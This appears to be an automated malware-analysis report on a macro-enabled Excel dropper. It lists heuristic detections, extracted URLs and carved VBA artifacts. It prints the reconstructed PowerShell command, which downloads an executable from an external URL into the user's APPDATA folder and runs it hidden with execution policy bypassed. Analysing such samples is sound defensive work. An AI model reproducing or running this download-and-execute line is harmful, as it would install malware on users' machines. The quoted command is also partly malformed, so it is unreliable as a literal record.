Malware Insights
The sample is an XLSM file that uses a document lure to trick users into enabling macros. Upon enabling, the VBA code constructs and executes a PowerShell command. This command downloads a file from 'http://hqa.co.za/iuy/JOKS.scr' and saves it as 'hjydiblcbfpdv.exe' in the user's profile directory, then executes it. The PowerShell command is obfuscated but reconstructs to 'powershell -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Windows\System\WindowsPowerShell\v1.0\powershell.exe" -Command "(New-Object System.Net.WebClient).DownloadFile('http://hqa.co.za/iuy/JOKS.scr','$(env:APPDATA\hjydiblcbfpdv.exe')"';Start-Process "$(env:APPDATA\hjydiblcbfpdv.exe")'. The VBA code also creates and executes a batch file named 'Ijmjtxt.bat' to facilitate this process.
Heuristics 5
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
VBA project inside OOXML medium OOXML_VBADocument contains vbaProject.bin — VBA macros present
-
Macro/content-enable lure medium SE_ENABLE_LUREDocument instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
-
External hyperlinks (3) low OOXML_EXTERNAL_HYPERLINKSDocument contains 3 external hyperlinks — clickable URLs are stored as external relationships. First target: http://go.microsoft.com/fwlink/?LinkId=846285
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://go.microsoft.com/fwlink/?LinkId=846285
- http://go.microsoft.com/fwlink/?LinkId=844969
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.basca9082efde232fe73d75a3236abf11fa637591477ec29607a1ea19d81d4b5f96 |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 2672 bytes |
vbaProject_00.bin412e6cadc21dc215d6b7e4715de9e99a6cb991eaefa93f12972706430aa9e756 |
vba-project | OOXML VBA project: xl/vbaProject.bin | 6656 bytes |
Open this report in the interactive analyzer, or submit your own file for analysis.